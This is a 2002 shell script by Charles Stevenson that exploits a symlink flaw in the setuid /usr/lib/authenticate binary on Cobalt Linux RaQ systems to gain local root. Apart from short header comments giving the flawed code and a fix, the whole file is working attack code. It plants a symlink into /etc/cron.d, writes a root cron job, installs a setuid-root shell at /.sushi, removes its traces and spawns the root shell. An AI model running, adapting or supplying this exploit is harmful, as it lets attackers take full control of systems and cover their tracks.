
  1. #!/bin/sh
  2. #
  3. # Cobalt Linux 6.0 Local Root Exploit
  4. #
  5. # Effects: <= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;)
  6. # Quick Fix: su - root -c "chmod 755 /usr/lib/authenticate"
  7. #
  8. # Problem Source Code:
  9. # fd = open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666);
  10. #
  11. # Suggested Code:
  12. # fd = mkstemp("/tmp/gmon.out-XXXXXX");
  13. #
  14. # Still need help Cobalt developers? Ok:
  15. # man 3 tmpfile; man 2 open; echo "Thanks core"
  16. #
  17. # by Charles Stevenson <core@bokeoa.com>
  18. #
  19. # Fri Jun 28 03:35:53 MDT 2002
  20. # - initial version
  21. # Sun Jul 7 20:12:41 MDT 2002
  22. # - added some features for robustness
  23.  
  24. echo "RaQFuCK.sh by core"
  25.  
  26. target="/usr/lib/authenticate"
  27. tempdir="/tmp"
  28.  
  29. if [ -u /.sushi ] ; then
  30.     exec /.sushi
  31. fi
  32.  
  33. printf "Checking for $target..."
  34. if [ -f "$target" ] ; then
  35.     echo "done."
  36. else
  37.     echo "NO!"
  38.     exit 1
  39. fi
  40.  
  41. printf "Checking if $target is setuid root..."
  42. if [ -u "$target" ] ; then
  43.     echo "done."
  44. else
  45.     echo "NO! Hrm... does this admin have a clue???"
  46.     exit 1
  47. fi
  48.  
  49. if [ ! -d "$tempdir/core" ]; then
  50.     printf "Creating $tempdir/core..."
  51.     if ! mkdir "$tempdir/core" 2>/dev/null ; then
  52.     echo "FAILED!" ; exit 1
  53.     fi
  54.     echo "done."
  55. fi
  56.  
  57. printf "Changing directory to $tempdir/core..."
  58. if ! cd "$tempdir/core" 2>/dev/null ; then
  59.     echo "FAILED!" ; exit 1
  60. else
  61.     echo "done."
  62. fi
  63.  
  64. printf "Creating cron.d symlink..."
  65. if ! ln -fs /etc/cron.d/core gmon.out 2>/dev/null; then
  66.     echo "FAILED!" ; exit 1
  67. else
  68.     echo "done."
  69. fi
  70.  
  71. printf "Changing umask..."
  72. if ! umask 000 ; then
  73.     echo "FAILED!" ; exit 1
  74. else
  75.     echo "done."
  76. fi
  77.  
  78. printf "Compiling root shell..."
  79. cat >sushi.c <<EOF
  80. #include <unistd.h>
  81. int main (int argc, char **argv, char **envp) {
  82.     setuid(0);
  83.     setgid(0);
  84.     execve("/bin/sh",argv,envp);
  85.     return -1;
  86. }
  87. EOF
  88. if ! cc sushi.c -o sushi 2>/dev/null; then
  89.     echo "FAILED!" ; exit 1
  90. else
  91.     echo "done."
  92. fi
  93.  
  94. printf "Compiling cron takeover..."
  95. cat >takeover.c <<EOF
  96. #include <stdlib.h>
  97. main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); }
  98. EOF
  99. if ! cc takeover.c -o own 2>/dev/null; then
  100.     echo "FAILED!" ; exit 1
  101. fi
  102. echo "done."
  103.  
  104. printf "Performing symlink attack..."
  105. printf "\n\n\n\n" | "$target"
  106. if [ -u /etc/cron.d/core ] ; then
  107.     echo "SYMLINK ATTACK FAILED!" && exit 1
  108. else
  109.     echo "done."
  110. fi
  111.  
  112. printf "Setting up evil cron job..."
  113. cat >croncore <<EOF
  114. */1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own";
  115. fi
  116. EOF
  117. if ! cat croncore 2>/dev/null >/etc/cron.d/core; then
  118.     echo "FAILED!" ; exit 1
  119. else
  120.     echo "done."
  121. fi
  122.  
  123. printf "Waiting for root shell"
  124. while [ ! -u /.sushi ] ; do
  125.     sleep 1 ; printf "."
  126. done
  127. echo "done."
  128.  
  129. cd /
  130.  
  131. printf "Cleaning up real quick..."
  132. if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then
  133.     echo "FAILED??? Fuck it!"
  134. else
  135.     echo "done."
  136. fi
  137.  
  138. echo "Spawning root shell!!! God Damn! I say GOD DAMN!!"
  139. if ! exec /.sushi -i; then
  140.     echo "Exec Failed!!! BUMMER!" ; exit 1
  141. fi